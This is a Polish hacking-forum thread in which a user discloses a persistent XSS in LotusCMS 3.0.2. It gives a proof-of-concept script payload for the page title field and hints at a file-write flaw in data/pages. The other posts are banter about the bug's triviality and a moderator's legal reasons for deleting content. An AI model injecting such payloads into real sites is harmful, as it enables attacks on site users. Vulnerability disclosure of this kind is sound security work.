Pokaż wyniki 1 do 8 z 8

Temat: persistent xss in LotusCMS 3.0.2

  1. #1
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie persistent xss in LotusCMS 3.0.2

    Kod:
    # exploit title: persistent xss in LotusCMS 3.0.2
    # date: 15.o3.2o11
    # author: lemlajt
    # software : LotusCMS
    # version: 3.0.2
    # tested on: linux
    # cve : 
    #
    
    PoC:
    
    When logged in, go to 'Pages', and try to 'Create a New Page' with param:
    $title="><script>alert('persistent')</script>
    
    
    BTW :
    There is a possibility to write to file in data/pages (via $title). Try it out;) 
    
    # regards,
    # lemlajt
    # *

  2. #2
    Zarejestrowany
    Mar 2011
    Skąd
    Obecnie, jestem przy komputerze
    Postów
    80

    Domyślnie

    widzisz tu gdzies bugtraq ?
    bo ja go jakos nie widze ...

  3. #3
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie

    bo masz zwykle konto. ja mam opcje publikuj na bugtraq hack.pl

    a wolisz newsy z jak hakowac gadu gadu?

  4. #4
    Zarejestrowany
    Mar 2011
    Skąd
    Obecnie, jestem przy komputerze
    Postów
    80

    Domyślnie

    a wolisz newsy z jak hakowac gadu gadu?
    Nie, ale dziekuje za propozycje ..

  5. #5
    Zarejestrowany
    Nov 2009
    Postów
    643

    Domyślnie

    Wszysko pięknie, z wyjątkiem faktu, że luka jest na poziomie "szkoły podstawowej".
    Szkoda czasu i energi na publikowanie tak trywialnych bugów...
    światło mądrości oświetla drogę z nikąd do nikąd

  6. #6
    Zarejestrowany
    Jan 2011
    Postów
    65

    Domyślnie

    życie jest trywialne. kończy się fiaskiem. takze bez filozoficznej masturbacji - zawsze mozesz nie czytac, albo znalezc 0daya w kernelu, wstane przed kompem i zaczne bic ci brawo. chyba ze tak jak forumowicz fotex [znalazles ale nie mozesz pokazac'

  7. #7
    Zarejestrowany
    Jul 2008
    Skąd
    /dev/random
    Postów
    556

    Domyślnie

    hmmm ciekawe

    a tak poza tym to w domu wszyscy zdrowi ?
    --
    ToM's Super Fix IT "No Fucking Problem"

  8. #8
    Zarejestrowany
    Mar 2011
    Postów
    27

    Domyślnie

    Cytat Napisał testujemy Zobacz post
    życie jest trywialne. kończy się fiaskiem. takze bez filozoficznej masturbacji - zawsze mozesz nie czytac, albo znalezc 0daya w kernelu, wstane przed kompem i zaczne bic ci brawo. chyba ze tak jak forumowicz fotex [znalazles ale nie mozesz pokazac'
    niewiem co tu do smiechu....za mało chyba jeszcze w zyciu widziałes

    decyzja o nie publikacji jest decyzja moja i w pewniej czesci admina hack.pl .jesli bedzie wam chciał napisac (nie trudno sie domyslec co moglo byc powodem usunieca tresci watku przezemnie) dlaczego tak a nie inaczej to napisze.
    tutaj tresc watku która wyjasnia troche http://hack.pl/forum/hacking/8702-po...est-prawo.html
    Poza tym jesli nie wiadomo w czym rzecz to chodzi o aspekt prawny...ludzie tacy jak wy powinni to wiedziec....pozatym dzien wczesniej bylo dokladnie opisane w watku wczym rzecz jednak najwidoczniej cie to omineło
    Ostatnio edytowane przez fotex : 03-18-2011 - 17:22

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj